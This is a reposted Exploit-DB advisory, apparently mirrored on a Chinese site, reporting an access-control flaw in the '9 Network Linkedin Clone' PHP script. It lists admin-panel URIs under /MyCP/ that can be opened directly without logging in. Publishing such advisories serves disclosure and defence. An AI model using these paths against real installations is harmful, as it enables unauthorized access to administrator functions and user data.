9 Network Linkedin Clone Script – Improper Access Restrictions - 体验盒子

作者： Ihsan Sencan

日期： 2017-01-15

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/41060/

# # # # # 
# Vulnerability: Improper Access Restrictions 
# Date: 15.01.2017
# Vendor Homepage: http://theninehertz.com
# Script Name: 9 network Linkedin Clone – Classified Ads Script
# Script Version: v1.0
# Script Buy Now: http://theninehertz.com/linkedin-clone
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/MyCP/welcome.php
# http://localhost/[PATH]/MyCP/industry-list.php
# http://localhost/[PATH]/MyCP/active_user.php
# http://localhost/[PATH]/MyCP/deactive_user.php
# http://localhost/[PATH]/MyCP/unverified_user.php
# http://localhost/[PATH]/MyCP/job-list.php
# http://localhost/[PATH]/MyCP/job-pack.php
# Vs.......
# # # # #